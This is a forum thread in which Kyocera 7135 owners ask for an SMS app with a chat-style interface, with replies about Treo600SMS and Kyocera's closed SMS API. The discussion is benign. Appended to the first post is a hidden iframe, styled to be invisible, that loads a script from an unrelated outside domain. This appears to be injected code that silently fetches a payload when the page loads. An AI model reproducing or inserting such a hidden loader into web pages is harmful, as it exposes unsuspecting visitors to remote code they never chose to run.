+ Reply to Thread

SMS chat-style interface

A buddy of mine just got the new Treo, and he has an app that lets him SMS message me, but displays the "conversation" as if it were a chat program (it knows that when I reply via SMS, to just show the contents of the message on the next line rather than make him open it as a new SMS message).

Anyone seen anything like this for our beloved 7135?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: SMS chat-style interface

Originally posted by Hark
    A buddy of mine just got the new Treo, and he has an app that lets him SMS message me, but displays the "conversation" as if it were a chat program (it knows that when I reply via SMS, to just show the contents of the message on the next line rather than make him open it as a new SMS message).

Anyone seen anything like this for our beloved 7135?
    Sounds like it is Verichat from www.pdaapps.com

Nah, I'm not talking about anything that uses "real" chat services (like AOL or MSN). I'm talking about something that uses SMS messaging, but makes it look like a chat service.

Go to the AOL site in the UK. You can download their IM software for free. It works well, however it doesn't seem to disconnect when you sign off.

The software is similar to aol im for your PC. You can see the entire conversation, and has an option for pop-up screen etc.

I really do appreciate the replies, but again I don't want an IM client for AOL or MSN (I've got these, they work fine). I want to use SMS messages only. I just want the interface for reading/sending SMS messages to "look" like a chat client.

Originally posted by Hark
    I really do appreciate the replies, but again I don't want an IM client for AOL or MSN (I've got these, they work fine). I want to use SMS messages only. I just want the interface for reading/sending SMS messages to "look" like a chat client.
    It might have been the Treo300SMS (now Treo600SMS) from pdaapps.com. I have seen another tool with gives you a chat type interface, but it is only for GSM phones.

The phone your friend has... Is it a Sprint Treo 600 or is it one of the GPS models coming out that he got a demo version of?

My two cents

I can toss in an answer here, owning both a Treo600 (and a 300 before that) and a 6035 (tryin' to establish my Kyo cred here - work with me people).

The SMS chat interface is a function of how Handspring designed that part of the device. As many may know, Sprint hasn't yet rolled out their 'official' SMS service (I still have my doubts that it'll be anything useful, given their SMS history). So, as is also known, the TreoX00SMS program from PDAApps was designed to compensate for Sprint's lack of built-in SMS. I used it religiously on my 300, and now have the new version on my 600. It does indeed have the chat-style interface as Hark mentions. So, to get what he's talking about presently takes TWO items - the 600, and Treo600SMS from PDAApps. Perhaps once Sprint comes out with SMS, the Treo600SMS program won't be needed, but it's an excellent interface, and I definitely doubt that Sprint can match it.

Now - to answer the specific question as to whether there's anything along these lines for the 7135 - not that I've heard of. I don't know of too many SMS-specific after-market programs (as opposed to IM-related stuff). Good luck my Kyo brethren!!

Thanks nrosser and zucchero - you guys hit the nail on the head. That's exactly what I'm talking about.

So you think that it's a function of the way the Treo600 works? That's too bad. It doesn't *seem* like it would take much to develop a client that works with the existing Messages application data (the SMS messages) to present it in a chat-style interface (isn't that basically how apps like Datebk work, presenting the Calendar app data in a different way, albeit adding tons of extra functionality)?

Oh well, maybe I should get off my butt and learn how to develop it myself. Of course, by the time I'm done, I'd want a different phone anyway.

try the PDAApps folks

Maybe you should send an e-mail to the PDAApps gang - they're very responsive and pretty much always get back to people. I don't think they yet have any Kyo-specific apps, but maybe they could be convinced to make something, if there's enough demand.
    support@pdaapps.com - worth a shot....

I think that you are refering to SMS Chat. I also would love to have them port it over to the Kyocera 7135. Unfortunately, I'm not a programmer. I just e-mailed them and hopefully they will get back. If there are any Kyocera 7135 programmers out ther that would like to help, they include the source code to their program which would help.

lots of luck with the SMS app...If you search the discussion board you will notice that there have been several programmers wanting to create an SMS chat program but Kyocera has not released the API for this. Furthermore if you try the palm built in messaging API it returns an error. So in short the only people that have created an SMS application for the 7135 has been those in Kyocera wireless.